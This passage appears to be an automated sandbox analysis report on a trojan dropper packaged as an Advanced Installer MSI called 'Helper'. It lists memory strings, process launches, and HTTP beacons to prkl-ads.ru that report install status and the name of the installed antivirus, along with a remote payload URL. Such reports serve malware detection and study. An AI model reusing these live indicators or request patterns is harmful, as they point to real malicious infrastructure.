00000005.00000002.550362681.000000000A4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.404099594.00000000070DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000005.00000003.403270333.00000000054FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004DFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://metacookie25c19ec61c.blob.core.windows.net
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drString found in binary or memory: https://metacookie25c19ec61c.blob.core.windows.net/test/build.jpg
                  Source: powershell.exe, 00000005.00000002.528616904.0000000005B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://prkl-ads.ru
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://prkl-ads.ru/?status=install(:
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://prkl-ads.ru/?status=reg&key=llks74638sj&site=Test
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://prkl-ads.ru/?status=start&av=
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drString found in binary or memory: https://prkl-ads.ru/?status=start&av=$displayNamesString
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://prkl-ads.ru/?status=start&av=Windows
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drString found in binary or memory: https://prkl-ads.ru?status=reg&key=llks74638sj&site=Test
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000699B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.00000000068D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000699B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.00000000068D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000699B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.00000000068D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: https://www.advancedinstaller.com
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000699B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.00000000068D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000699B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.00000000068D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI76B1.tmp.1.drString found in binary or memory: https://www.ssl.com/repository0
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: https://www.thawte.com/cps0/
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: https://www.thawte.com/repository0W
                  Source: unknownDNS traffic detected: queries for: prkl-ads.ru
                  Source: global trafficHTTP traffic detected: GET /?status=reg&key=llks74638sj&site=Test HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: prkl-ads.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /?status=start&av=Windows%20Defender HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: prkl-ads.ru
                  Source: global trafficHTTP traffic detected: GET /?status=install HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: prkl-ads.ru
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000000.387537837.0000000000E08000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: FlashWindowFlashWindowExGetPackagePathhttp://www.yahoo.comhttp://www.example.comhttp://www.google.comTESTtin9999.tmpattachment=.partGETcharsetDLD "filenameutf-8utf-16123POSTAdvancedInstallerLocal Network ServerISO-8859-1US-ASCIIHTTP/1.0Range: bytes=%u- equals www.yahoo.com (Yahoo)
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeString found in binary or memory: UFlashWindowFlashWindowExGetPackagePathhttp://www.yahoo.comhttp://www.example.comhttp://www.google.comTESTtin9999.tmpattachment=.partGETcharsetDLD "filenameutf-8utf-16123POSTAdvancedInstallerLocal Network ServerISO-8859-1US-ASCIIHTTP/1.0Range: bytes=%u- equals www.yahoo.com (Yahoo)
                  Source: unknownHTTPS traffic detected: 81.177.140.69:443 -> 192.168.2.3:49724 version: TLS 1.2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CE67F00_2_00CE67F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CF27F00_2_00CF27F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D0AC300_2_00D0AC30
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CF3E100_2_00CF3E10
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D900400_2_00D90040
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BDE2300_2_00BDE230
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D9839A0_2_00D9839A
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BDC3630_2_00BDC363
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BE84B00_2_00BE84B0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CAC4500_2_00CAC450
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BB47720_2_00BB4772
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D668400_2_00D66840
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CD29A00_2_00CD29A0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CDEAF00_2_00CDEAF0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D88A2C0_2_00D88A2C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BD4B300_2_00BD4B30
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BB2EA00_2_00BB2EA0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D9AEF10_2_00D9AEF1
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BD8E200_2_00BD8E20
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D9CE190_2_00D9CE19
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BD11B00_2_00BD11B0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00DA328A0_2_00DA328A
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BE73A00_2_00BE73A0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BCF4200_2_00BCF420
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00C275000_2_00C27500
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BD96500_2_00BD9650
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BEB7200_2_00BEB720
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BB74800_2_00BB7480
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BDF9F00_2_00BDF9F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D679000_2_00D67900
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BD00405_2_00BD0040
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDC5075_2_00BDC507
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDBB085_2_00BDBB08
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDAC305_2_00BDAC30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BD00395_2_00BD0039
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BD00345_2_00BD0034
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDC0075_2_00BDC007
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BD00065_2_00BD0006
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BD63D85_2_00BD63D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BD63C85_2_00BD63C8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDBAF85_2_00BDBAF8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDBB015_2_00BDBB01
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDAC2D5_2_00BDAC2D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDAC285_2_00BDAC28
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDAC215_2_00BDAC21
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDC5B85_2_00BDC5B8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeSection loaded: lpk.dll
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeSection loaded: tsappcmp.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI7331.tmp
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\446fc6.msi
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: String function: 00BBA140 appears 42 times
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: String function: 00BBA6D0 appears 43 times
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: String function: 00BB8190 appears 53 times
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: String function: 00BB9610 appears 121 times
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00C8A630 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W,0_2_00C8A630
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D11D40 NtdllDefWindowProc_W,0_2_00D11D40
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00C240A0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_00C240A0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BC8280 NtdllDefWindowProc_W,0_2_00BC8280
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BD8270 NtdllDefWindowProc_W,0_2_00BD8270
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BC8840 NtdllDefWindowProc_W,0_2_00BC8840
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BD2C90 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection,0_2_00BD2C90
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BCEE70 NtdllDefWindowProc_W,0_2_00BCEE70
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BC4E60 GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W,0_2_00BC4E60
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BCEFE0 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_00BCEFE0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00C6EF50 NtdllDefWindowProc_W,0_2_00C6EF50
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BC5580 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,NtdllDefWindowProc_W,SysFreeString,0_2_00BC5580
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameHelper.exe. vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeBinary or memory string: OriginalFileNameHelper.exe. vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeBinary or memory string: OriginalFilenamelzmaextractor.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeBinary or memory string: OriginalFilenameAICustAct.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeBinary or memory string: OriginalFilenamePrereq.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeBinary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile created: C:\Users\user\AppData\Roaming\Helper Company LLC
                  Source: shi69FA.tmp.0.drBinary string: oNrtCloneOpenPacket\Device\NameResTrk\Record3VtI
                  Source: classification engineClassification label: mal52.troj.spyw.evad.winEXE@11/38@2/2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BBA000 LoadResource,LockResource,SizeofResource,0_2_00BBA000
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeReversingLabs: Detection: 13%
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeVirustotal: Detection: 11%
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3407EF71A9E7EFAA675EDBEA938667C8 C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692671532 "
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AADEFB259C244F0AA7BE078D54CFCDDA
